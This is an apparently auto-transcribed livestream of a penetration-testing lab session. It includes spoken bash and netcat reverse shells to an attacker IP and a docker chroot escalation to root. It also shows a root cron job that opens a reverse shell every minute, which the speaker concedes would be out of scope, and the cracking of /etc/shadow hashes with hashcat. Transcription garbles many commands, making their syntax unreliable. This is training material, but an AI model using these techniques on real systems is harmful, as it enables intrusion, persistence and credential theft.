so let's just get to root again. Yep. And we'll go ahead, we'll hop back into root, and we'll go from there. CD the user bin. V, hop back into root. Okay, ID, I am root. Cron tab tac E. Right. Oh, we can't scroll down? Okay, we can. We can enter. We just can't hit left and right. And we're not seeing what we actually want to see, huh? That's horrible. Okay. Control X or Control C. No. What is that? Yes. Enter. Oh god, I don't want to save anything. No, cancel. Control C. Control X. No, enter. This is the worst, huh? Let's terminate channel. Shell. Let's just make a elf file to get a call back to me again, which will then allow me to be able to mess with that, huh? Let's just go ahead and do that, huh? That'll be fun. Alright. What is going on here? Yes, please. Oh, God. You keep doing that, huh? Slash bin bash. Where? It's literally the syntax that you actually use. You punk ass. Okay. Fine then. Exit out of there. And let's just keep working on this guy, huh? Let's go ahead and do a... Let's do it one more time, maybe. Yep, that's working fucking great. Thank you so much. Let's go ahead and do a Control Z, session stack I, sessions 5 maybe? You have no idea how helpful that is. That is super helpful to see that whenever you Control Shift C and Control Shift V. You guys actually have no idea how helpful it is to see all of that bullshit like right there. And I can't even go back. I can't do anything else. That's fucking annoying as shit. Python 3 tac C import pty. I'm sorry, I get tired if you can't tell. pty.spawn bin bash. Okay, there's that at least. Okay, now let's go ahead and get back into frickin' root, and then we're gonna create something back to us. Maybe like a elf file or something like that. Yo, fuck off, mate. Seriously? Piece of shit. Fuck you, dude. cd in the user bin. /docker run tac v / that guy / mnt tac rm tac it ubuntu 18.04 chroot mnt sh. Hopefully that works. Okay, we got that right. Let's go ahead and create a listener. Let's just do a quick bash reverse shell or something like that and see if we can get it. Cat bash reverse shell. We'll up here, we'll type in which bash. Okay, user bin bash, right, cool. So we should be good with this guy right here. We should. Who knows though, right? Who knows? You know, I don't know why the hell I'm even copy and pasting down here, because now I can be able to do that up here, huh? Let's see though. No, that was a stupid idea by me, wasn't it? Okay, bash tac I and /dev /gcp /10.50.104.236 9999 0 that guy and 1. Good. So let's see. Is it and2 or something? It's probably and2 or something, isn't it? But I'm not about to go through that whole damn thing yet, so we're going to pick another one. Can I do an NC tach E? That could be bad syntax. Invalid option. Damn, okay. Let's try to do a... We do try this guy like right here. We just do this like right here. That's a freaking long one though, huh? That is definitely a long one. Thank God. FIFO/temp f cat /temp f pipe /bin sh tach I to that thing and 1 netcat 10.50.104.236.9999 /temp f. Okay. Now, why did I just do all that, right? Like, what was the point of doing all of that, right? Cat scripts, full shell. Because we're going to call a netcat reverse shell, bring it back to here, which then we're going to do everything that I want to do with it. So we are going to grab this guy. This is all literally, boom. As you can see, we are root. Cool. It's still using 20.04. Don't know why the hell we use 18, but whatever. And then we're going to do a, let me see here, Control Z, right? Press Control Z, okay. STTYA, tach A. Do the foreground one, right? Remember those numbers. 1683. Okay, enter twice. Export term, X term. Alright. STTY rows. And it's going to be 16 columns. STTY rows 16 columns. It's going to be 83. Okay. Now we can press up, down, left, right, A, B, A, B, up, down, up, down, up, down, left, right, left, right. What is it? A, B, A, B, start, or whatever. Something like that, right? Alright, let's go ahead and do a, let's go ahead and CD actually into home. CD into Ubuntu. Tab also works out too. As soon as that is successful, what's that? Okay, cool. CD.ssh. I still don't know what it actually CD into var ww. I still don't know where the hell this user. Okay, cool. Go ahead, user.text. Is that it? Is that the user.text that wants it right there? I still don't know where it's at. Let's try that one like right there. Okay, cool. We found the user.text. No matter the last one, like where is it? Alright. Let's go ahead and make a cron tab tach E. And we are going to every minute have it come back. So we're going to say star /1, because that's every 5 minutes, I think. I think it is at least. Let's see here. We looked up how to do every 5 minutes, right? On program, star /5 is if you want to do every 12 hours. So every 5 minutes. So that is a 5. Okay, so we're going to do star /1. We're going to do star /1. So every 1 minute. That did start not work for me very well. Star /1. Star. Alright. It's already going to be running as root because we're doing cron tab tach E within root. So we don't have to really worry about that. Okay. And we're just going to run, let's just say, we're going to run something called shell rev shell.sh. We'll say rev shell. Actually, we got to say where it's at, huh? So let's go ahead and do a bash. Let's go to bash /root /rev shell.sh. Okay. That's what we're going to do like right there. And then we're going to make that red shell.sh do something for us, right? Yes. So we are going to go into cd/root. And we are going to make a red shell.sh. We're going to say nano rev shell.sh. Okay. And then from here we can go ahead and do a alright, cat scripts netcat reverse shell. It's going to run this whole thing right here. Right. It's going to run it on port. We will say 666. Okay. So in case anyone's playing Doom, then it won't work. And that's going to be for my IP address of 1050.104.236. 236. That's going to run every minute, right? And definitely no. Whoopsie daisy. There we go. Okay, now let's go ahead and do a netcat LVMP 666. And we're just going to wait and make sure that actually does run. That's all. And then next time we come in, we should just get a reverse shell off of that guy. At least that's what my thought process is. Okay then, well, ID and I'm root. Okay, cool. So we'll just say admin notes. Admin notes made a cron job to run a reverse shell to my IP every, how many minutes was it? Every minute on root 192.168.100.1 on port 666. There. Okay. There's that. Alright, cool. So we're getting somewhere now, right? Now we're root here. Let's go ahead and do an aircrack-ng. See what else we can get. We got this 172.17.01. Can we ping him? Think about actually going, taking a minute break or whatever. Yes, we can ping him. Do we have to do like a proxy change for that guy? Can we ping him from over here? We can. We can ping him also. Okay, can we do an mmap? I mean, is there any proxy change in this? ADX message and Nessus is up and running? 172.17.01, huh? I have config. 172.17.04. So we have 01 and we have Nessus, and 8834 is Nessus. Then we have another port 80 and then 1716 X message. What is that? Let's go ahead and try to find it. Let's go ahead and find out, huh? Post-exploitation from the shadows. Oh, I guess we could look at shadows, huh? There's a cron job like right there. We could cat etsy shadow, couldn't we? What non-default you can find a shadow file on L server? I don't know. Let's go ahead and cat /etsy shadow. Linux admin. I'm gonna go with Linux admin. We already saw that in home though. Is it Linux admin or Ubuntu? Okay, it's Linux admin, which we already found that in home, so not really too, you know, like whoa, you know what I'm saying? But we do find some nice little hashes in here, don't we? So we always want to try to crack hashes whenever we find them, and that'll tell us how well their password policy is. So let's go ahead and let's just grab this whole thing, and we're gonna do a nano hash.text. Right. We'll control shift. We could not crack that admin one from earlier, could we? That's okay though. Go ahead and throw these guys into here. And throw this Linux admin one into here. Because I might be able to crack one of their hashes actually, and that whole thing with the port 666 might be totally useless in all honesty. But we'll give this guy a try. With John hash.text. Where this rocky.text, text fork equals 4. We can do that. Sure, why not? Alright. And we'll see if this guy's able to crack anything. Hopefully he is, because then we might just be able to SSH in. Do they have a bin bash capability? So if we do a cat etc password, we might be able to see if they have like a bin bash capability, right? Let's go ahead and do a cat / etc password. That seems out of scope. What does? To make the cron job? Or to try to crack the password? Cracking the password would not be. The cron job, yeah, that would 100% be out of scope. But in all honesty, if you already got this far, this test is already over with. As soon as you got into that web server, the test is over with. You're done with the test until they tell you to keep going. But no, creating a reverse shell back to myself, yeah, that's 100%. That would 100% be out of scope, yes. You can't just start throwing reverse shells everywhere in cron jobs. If I worked this hard, but also somebody else couldn't come in and just, you know, quick reset and reset my box. Now the company, I guess, could turn it off, but you know, if I'm in a, you know, if I'm in something like this, that's gonna be a huge problem. They just come in and just turn it off, right? So now we have crack all the things. Okay, we did already get the shadow one right. And this guy is actually talking about using hashcat for it, right? So hashcat, I do like hashcat. Everyone likes hashcat. This guy's going to take 10 damn hours, so we are going to have to use hashcat. Now, usually I don't use it, and the reason I don't is because hashcat doesn't really seem to play well with VMs. I've noticed that other people have gotten it to work just fine. I also have AMD, so what we're going to have to do is we're going to have to do an lstack-la. We are going to have to copy these, cat.hash.text, and we are going to have to bring these over to my parent system here. And then I also have to sanitize my parent system to make sure there's nothing crazy up on it and everything like that. So let me see here. I wonder if I can make it to where just we'll close that out. 1 second. Alright, we should be good as long as I don't mess up myself. Display capture, there we are. And let's get into some hashcat here, huh? Let's go ahead and first off cd into downloads. cd into John, right? No, not John. cd into hashcat. So I had hashcat and downloads, didn't I? Nope, it's in desktop. cd back, cd into OneDrive, desktop. cd into hashcat, right? Okay, now we need to go into hashcat actually, and I need to put some hashes in there, don't I? Hashcat. Okay, let's go ahead and throw some hashes in here, huh? Do I have like a hash.txt file? Cur hash, header, hashcat. What's hashcat? That's not really what I want to overwrite, like right there. Rocku, show, curb word, password list. Oh, that was for one of the boxes that I made. See if it would actually work or not. Hash. There's a hash. There we go. Alright, cool. File save. So we're going to call it hash.txt. And we do have our hashcat and everything right. Let's go ahead and try to fire this guy up. So let's do a hashcat.exe. Yep. And let's see how to do this. So first off, we're going to need to know what type of hashes those are, right? So let's go ahead and hop back over to my Linux machine here. And we will go out to the internet and we will say hashcat.net. Is that what it is? Can we do like Control F to actually find the different stuff? $6$. Right, isn't that what we were working with here? It is $6$. Yes, so it is a, where'd it go? Okay, what number is that? Hashcat, that doesn't help out at all. Hashcat, you fucker, what number is it? Like, that's great that you can crack that one. Thank you for telling me that that's your algorithm that you can use. Thanks a lot. But what number is it? Hashcat $6$. Which tech M is that? Hashcat, how about that? $1,800. Okay, so let's go ahead and do a TAC M 1800 hashcat dot exe TAC M 1800. The hash file, right, which is going to be hash.txt, and then the dictionary file, which is going to be rocky.txt, correct? Please be patient. I'll try my best. Alright. Status binary check. Okay. Host memory required for this attack, 281 megabytes. We can use more if you want. You can use as much as you want, dude. We got plenty. We got plenty of memory. We're only at 60 C, so let's go. Let's go. Use as much as you possibly can. Take that GPU and tell it who is boss, dude. We're only at 62 C, 61 C, 62. I don't even hear the frickin' fans. Come on, let's go. Let's get this thing moving, huh? Alright. We're going to let that guy do his thing. Hashcat there. And we're going to see if he cracks any hashes. Hopefully he does. Isn't there a way to make it faster also? Like even... Okay, but drastically reduced. Pure kernels can crack longer password address if you want to switch to optimized kernels, append tag over to your command line. Pure unoptimized backend kernels. Select. Ooh, we want optimized kernels, right? So let's do that. Temperature about abort trigger set to 90 C. No, higher than that. You can at least do 110. It's a GPU, bro. Let it go. Let it go. Let it. Well, let it be. Now let it be. All right. That thing ain't gonna get to 90 degrees anyways, man. The freaking CPU's water cooled. The GPU has all the fans blasting on it. That thing ain't gonna get to no. Thing ain't gonna go anywhere. All right. So we'll let Hashcat do its thing over there. While Hashcat's doing his thing, let's go ahead and keep reading on. He's got 2,500, but we're not doing that one like right there, are we? We're doing a... Ooh, did I have to do TAC AO? I think the main difference is that Hashcat does use the GPU. No, we don't want John the Ripper. TAC AO is not needed, but we don't want... For this, like right now, we do not want John the Ripper. We are going to be here for days if we have John the Ripper going. Just so you know. Drastic speed impact can be better for specific attacks. We can try TAC AO. We can do a TAC AO, and then we can do a TAC S, I guess. But no, we want... Hashcat's better than John the Ripper. It actually is. That cracky passwords, all that stuff. Because Hashcat utilizes the GPU. Your GPU can crack way better than anything else. John the Ripper still utilizes your CPU. The reason I'm using Hashcat on this guy, not John the Ripper, first off, John the Ripper was going to take 10, I think it said hours to crack it, the passwords. That's what I thought it was going to take. Hashcat should not take nearly that long. Let's go ahead and see the statuses here. So, Rocky.tech, speed is 87,313 hashes per second. Alright, so it shouldn't take too much time. We can see how much faster that's going to go than what time estimated is 4 minutes 55 seconds. John the Ripper was 10 hours. So you can see how much faster that's going to go. The hardware is at 74C. That's core clock's 1550. Utilization 98%. Fans at 58%. That's it. So I can actually turn my fans up. If I really got scared, we can actually turn the fans up to like 75C during that time frame. But we're going to let that guy go ahead and do its thing. Pivoting, digging a tunnel to nowhere. Okay. They're using chisel to pivot, which I never really use chisel. But we do it at 172, right? What are they pivoting to anyways? Like, what are you guys trying to pivot to? The other web server? Command and control, web app exploitation, AV evasion, post-exploitation, situational awareness, privilege escalation, NTL, and relay. So once this guy actually cracks, I think that's going to be it for me for tonight. So I'm getting pretty tired here. So we're going to let him do his thing. Once he cracks it, I think I'm going to be just about done for tonight. I'm getting pretty tired here. So let's do a Got to have a look. Thanks. You can use John on GPU too. Really? It has, amongst others, OpenCL support. Camp Kiffer, how do you do that? Because I've never done that. Let's go ahead and do John the Ripper on GPU. I've never heard of that before. John the Ripper GPU support. Okay. Well, how do I do it then, John? Ah, yes, of course. Video call drivers. Okay. Brute force can be used. CPU, video core, CPU, GPU. Okay. So supposedly John the Ripper can use a GPU. So I remember John the Ripper cannot just work with any supported algorithms using OpenCL. The module must be created for them. Therefore, some algorithms can only be cracked on CPU, while some others can be cracked on GPU or on CPU. Okay. List of algorithms may vary by OS. By installed, to see a list of supported algorithms, do tac list formats. You can also use the dev option like this: dev equals GPU, dev equals CPU. So we can just do dev equals start crack password on a third OpenCL device. In my case, is regular cores instead of processors. So we can just do dev equals GPU on John the Ripper. So we can do John, but we will fork equals 4 tac dev equals GPU. Maybe it's just tac dev equals GPU. Okay, it does not like that at all. Test format that. Choose only GPU devices or only CPU devices. So start cracking the password on a second OpenCL device. How do I look at my OpenCL devices? Oh, is it graded? Number 2 is the video card. Yeah, how do we know? Okay. This is by John tac list OpenCL devices. List equals or just list? Yeah, equals OpenCL devices. Okay, so it does not OpenCL. Whoopsie daisy. Maybe if I type it in correctly, then it will. Okay. So it doesn't like it. This may also be because of a VM again, though. Also, I do have John the Ripper also on here. Okay, what do we got here? Linux rules. We got one. We got a password. Who's this for? Which one of you boots had Linux rules as password, huh? Or does you have to look at that guy's stuff? Or just wait till this guy's done? Approaching final key space. Workload adjusted. Thank you very much. So we have Linux rules, right? As one of the passwords. Cool, I think. Alright. Yeah, so we have Linux rules. I don't know who for. Probably Linux admin, though. Let's go ahead and throw that into here. And I think that's going to be it for me for tonight. Linux rules, submit, completed. We have that. We have our out of scope guy coming back to us, right? Our not so in scope guy coming back to us. Hopefully that stays there. One of you guys are going to get this, get on there and delete that, aren't you? It's just ultimate troll move. Watch me tomorrow, just waiting for it to come up and just like, you know. But at least we have all the what is it? All the notes and everything. So let's go ahead and what we want to do now is we want to actually take a picture of this before we get off, and we want to put that on our other guy, right? So Control Shift S, I believe it is. Nope. Windows Shift S. Yeah, Windows Shift S. Okay, and that's going to be within. And we'll do it actually the one that we did down here more. Windows Shift S and that's going to be in Windows to do a print screen. And we'll go ahead and we'll throw that in there, okay? And actually we'll show what's in cat or type hash.text first. Go ahead and throw that guy right there into there. Show him over here. Cracking. Pretty cool. I have to give it a try. Etsy cracking shadow passwords. Okay, and we'll go ahead and we will throw this guy in there. Yeah, ours ended in a 1, so yeah, it looks like it was V1, right? That's the one that got cracked, right? It was V1, I believe it was. That was the one that actually got cracked, I believe. So we can go ahead and throw that guy into there, right? V1 was in there. Let me see here. I'm trying to figure out which one got cracked. Yeah, V1. Okay, cool. And then we see, so let's go ahead and grab this up here. Let's show how we did that. Boom. Okay. Go ahead and throw him over in here. And we will throw in this guy right down here, showing that it did crack that password, right? And there it is. We did crack one password for the user Linux admin. We did crack one password for the user Linux admin. Which, if you were to look at this, we have 3 users on here, right? And we have 1, 2, 3. One of them is root. All right, we have 3 users on here, and one of them is Ubuntu. And out of those 3 users, we cracked one of the passwords. So right now we have a 33% cracking rate, right? Which is 33.33333% cracking rate, which is really bad. You know, that's not good. Carrot the Barbarian, why's that? So we got Linux rules, and we put that in there for him. And yeah, we're gonna go ahead and let's see who else is streaming like right now, and we'll keep doing this maybe tomorrow or maybe the next day. I don't know which one yet, if I'm gonna be streaming or not tomorrow. So B7H30, let's go ahead and he's on there, so let's send it over. Minimize, and we will there, and let's go ahead and I don't know how to even do this. I always forget how to do this part. /raid. There you go. Raid has been created. So let's go check out B7H30, and I will talk to you all later. Raid now.